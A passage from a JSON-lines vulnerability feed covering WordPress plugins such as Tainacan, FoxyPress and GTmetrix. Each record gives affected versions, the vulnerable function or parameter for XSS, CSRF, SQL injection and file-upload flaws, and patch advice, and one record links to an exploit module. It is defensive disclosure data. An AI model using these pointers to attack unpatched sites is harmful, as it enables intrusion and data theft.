version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3beee75-0480-4504-a177-45f8cd32cf36?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3beee75-0480-4504-a177-45f8cd32cf36?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117664%40wp-accessibility-helper&new=3117664%40wp-accessibility-helper&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117664%40wp-accessibility-helper&new=3117664%40wp-accessibility-helper&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10027","slug":"blogger-importer","versionImpact":"0.5","versionEndExcluding":"0.6","description":"A vulnerability was found in Blogger Importer Plugin up to 0.5 on WordPress. It has been classified as problematic. Affected is the function start\/restart of the file blogger-importer.php. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 0.6 is able to address this issue. The name of the patch is b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70. It is recommended to upgrade the affected component. VDB-230658 is the identifier assigned to this vulnerability.","recommendation":"Update to version 0.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230658\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230658\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230658\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230658\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/blogger-importer\\\/commit\\\/b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/blogger-importer\\\/commit\\\/b83fa4f862b0f19a54cfee76060ec9c2e7f7ca70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5051","slug":"callrail-phone-call-tracking","versionImpact":"0.5.2","versionEndExcluding":"0.5.3","description":"The CallRail Phone Call Tracking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'callrail_form' shortcode in versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping on the 'form_id' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982876\\\/callrail-phone-call-tracking#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2982876\\\/callrail-phone-call-tracking#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35def866-7460-4cad-8d86-7b9e4905cbe4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35def866-7460-4cad-8d86-7b9e4905cbe4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/callrail-phone-call-tracking\\\/tags\\\/0.5.2\\\/callrail.php#L174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/callrail-phone-call-tracking\\\/tags\\\/0.5.2\\\/callrail.php#L174\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5475","slug":"responsive-video-embed","versionImpact":"0.5","versionEndExcluding":"0.5.1","description":"The Responsive video embed WordPress plugin before 0.5.1 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 0.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cee66543-b5d6-4205-8f9b-0febd7fee445\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cee66543-b5d6-4205-8f9b-0febd7fee445\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5946","slug":"squelch-tabs-and-accordions-shortcodes","versionImpact":"0.4.8","versionEndExcluding":"0.4.9","description":"The Squelch Tabs and Accordions Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018tab\u2019 shortcode in all versions up to, and including, 0.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f63bd9-3031-40e8-b72e-1cbbcce5b782?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f63bd9-3031-40e8-b72e-1cbbcce5b782?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squelch-tabs-and-accordions-shortcodes\\\/trunk\\\/squelch-tabs-and-accordions.php#L455\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/squelch-tabs-and-accordions-shortcodes\\\/trunk\\\/squelch-tabs-and-accordions.php#L455\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114198\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3114198\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-37996","slug":"gtmetrix-for-wordpress","versionImpact":"0.4.7","versionEndExcluding":"0.4.8","description":"Cross-Site Request Forgery (CSRF) vulnerability in GTmetrix GTmetrix for WordPress plugin <=\u00a00.4.7 versions.","recommendation":"Update to version 0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4463","slug":"squelch-tabs-and-accordions-shortcodes","versionImpact":"0.4.7","versionEndExcluding":"0.4.8","description":"The Squelch Tabs and Accordions Shortcodes plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.4.7. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 0.4.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082482%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&old=3067680%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3082482%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&old=3067680%40squelch-tabs-and-accordions-shortcodes%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd9490f2-ad52-477e-ae3b-be49984e8189?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd9490f2-ad52-477e-ae3b-be49984e8189?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-32503","slug":"gtmetrix-for-wordpress","versionEndExcluding":"0.4.7","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in GTmetrix GTmetrix for WordPress plugin <=\u00a00.4.6 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/gtmetrix-for-wordpress\\\/wordpress-gtmetrix-for-wordpress-plugin-0-4-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10020","slug":"foxypress","versionEndExcluding":"0.4.2.2","description":"The FoxyPress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the uploadify.php file in versions up to, and including, 0.4.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.","recommendation":"Update to version 0.4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/113576\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/113576\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/555071\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/555071\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_foxypress_upload.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_foxypress_upload.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20210120060045\\\/https%3A\\\/\\\/www.securityfocus.com\\\/bid\\\/53805\\\/info\",\"name\":\"https:\\\/\\\/web.archive.org\\\/web\\\/20210120060045\\\/https%3A\\\/\\\/www.securityfocus.com\\\/bid\\\/53805\\\/info\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fbc88da-8944-433c-b94d-9604ffe13d8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8fbc88da-8944-433c-b94d-9604ffe13d8a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11384","slug":"arena-liveblog-and-chat-tool","versionImpact":"0.3.0","versionEndExcluding":"0.4.0","description":"The Arena.IM \u2013 Live Blogging for real-time events plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'arenablog' shortcode in all versions up to, and including, 0.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.4.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/shortcode\\\/init.php#L73\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/arena-liveblog-and-chat-tool\\\/trunk\\\/shortcode\\\/init.php#L73\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bf534ba-1288-4fa5-bdfb-de62e751e5c2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bf534ba-1288-4fa5-bdfb-de62e751e5c2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5041","slug":"track-the-click","versionImpact":"0.3.11","versionEndExcluding":"0.3.12","description":"The Track The Click WordPress plugin before 0.3.12 does not properly sanitize query parameters to the stats REST endpoint before using them in a database query, allowing a logged in user with an author role or higher to perform time based blind SQLi attacks on the database.","recommendation":"Update to version 0.3.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45194442-6eea-4e07-85a5-4a1e2fde3523\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45194442-6eea-4e07-85a5-4a1e2fde3523\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7135","slug":"tainacan","versionImpact":"0.21.7","versionEndExcluding":"0.21.8","description":"The Tainacan plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_file' function in all versions up to, and including, 0.21.7. The function is also vulnerable to directory traversal. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 0.21.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4dd0c6a-75af-4b53-ac13-fc4ef0e9001d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4dd0c6a-75af-4b53-ac13-fc4ef0e9001d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L370\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L370\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-background-processes-controller.php#L378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127693\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127693\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13236","slug":"tainacan","versionImpact":"0.21.12","versionEndExcluding":"0.21.13","description":"The Tainacan plugin for WordPress is vulnerable to SQL Injection via the 'collection_id' parameter in all versions up to, and including, 0.21.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 0.21.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L707\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L707\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L732\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.12\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php#L732\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226475\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226475\\\/tainacan\\\/trunk\\\/classes\\\/api\\\/endpoints\\\/class-tainacan-rest-reports-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9638fb98-045b-44ec-8b53-15cfa3693ee7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9638fb98-045b-44ec-8b53-15cfa3693ee7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9221","slug":"tainacan","versionImpact":"0.21.10","versionEndExcluding":"0.21.11","description":"The Tainacan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.21.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.21.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a8a7df-b472-4a81-b808-a413c158c1cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/85a8a7df-b472-4a81-b808-a413c158c1cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165873\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165873\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tainacan\\\/tags\\\/0.21.10\\\/classes\\\/theme-helper\\\/template-tags.php#L1298\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12459","slug":"ganohrs-toggle-shortcode","versionImpact":"0.2.4","versionEndExcluding":"0.2.5","description":"The Ganohrs Toggle Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'toggle' shortcode in all versions up to, and including, 0.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ganohrs-toggle-shortcode\\\/tags\\\/0.2.4\\\/ganohrs-toggle-shortcode.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207393%40ganohrs-toggle-shortcode&new=3207393%40ganohrs-toggle-shortcode&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207393%40ganohrs-toggle-shortcode&new=3207393%40ganohrs-toggle-shortcode&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efd49905-0f2c-44b7-85c6-c2b77440ac17?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13590","slug":"ketchup-shortcodes-pack","versionImpact":"0.1.2","versionEndExcluding":"0.2.1","description":"The Ketchup Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spacer' shortcode in all versions up to, and including, 0.1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222176\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d25e292-b62b-493e-976c-a5eb95505065?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d25e292-b62b-493e-976c-a5eb95505065?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7894","slug":"if-menu","versionImpact":"0.19.1","versionEndExcluding":"0.19.2","description":"The If Menu plugin for WordPress is vulnerable to unauthorized modification of the plugin's license key due to a missing capability check on the 'actions' function in versions up to, and including, 0.19.1. This makes it possible for unauthenticated attackers to modify delete or modify the license key.","recommendation":"Update to version 0.19.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/if-menu\\\/trunk\\\/src\\\/Admin.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/if-menu\\\/trunk\\\/src\\\/Admin.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203054%40if-menu&new=3203054%40if-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203054%40if-menu&new=3203054%40if-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff6ebf45-4617-44dd-94d8-28aa8bc1609b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11371","slug":"theatre","versionImpact":"0.18.6.2","versionEndExcluding":"0.18.7","description":"The Theater for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 0.18.6.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 0.18.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theatre\\\/trunk\\\/functions\\\/wpt_productions_list_table.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/theatre\\\/trunk\\\/functions\\\/wpt_productions_list_table.php#L332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193083%40theatre&new=3193083%40theatre&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193083%40theatre&new=3193083%40theatre&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65bf0897-4d90-41e7-89a3-69845ea54ce5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65bf0897-4d90-41e7-89a3-69845ea54ce5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8767","slug":"football-leagues-by-anwppro","versionImpact":"0.16.17","versionEndExcluding":"0.16.18","description":"The AnWP Football Leagues plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 0.16.17 via the 'download_csv_players' and 'download_csv_games' functions. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","recommendation":"Update to version 0.16.18, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342787\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php\",\"name\":\"http:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3342787\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L265\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L265\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/football-leagues-by-anwppro\\\/trunk\\\/includes\\\/class-anwpfl-data-port.php#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04676263-cdad-40cd-bb54-61beb727e09d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04676263-cdad-40cd-bb54-61beb727e09d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4635","slug":"menu-icons","versionImpact":"0.13.13","versionEndExcluding":"0.13.14","description":"The Menu Icons by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018add_mime_type\u2019 function in versions up to, and including, 0.13.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 0.13.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90284576-6570-4e4c-8eb3-743bc402ea1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/90284576-6570-4e4c-8eb3-743bc402ea1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/menu-icons\\\/tags\\\/0.13.13\\\/vendor\\\/codeinwp\\\/icon-picker\\\/includes\\\/types\\\/svg.php#L69\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/menu-icons\\\/tags\\\/0.13.13\\\/vendor\\\/codeinwp\\\/icon-picker\\\/includes\\\/types\\\/svg.php#L69\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086753\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086753\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
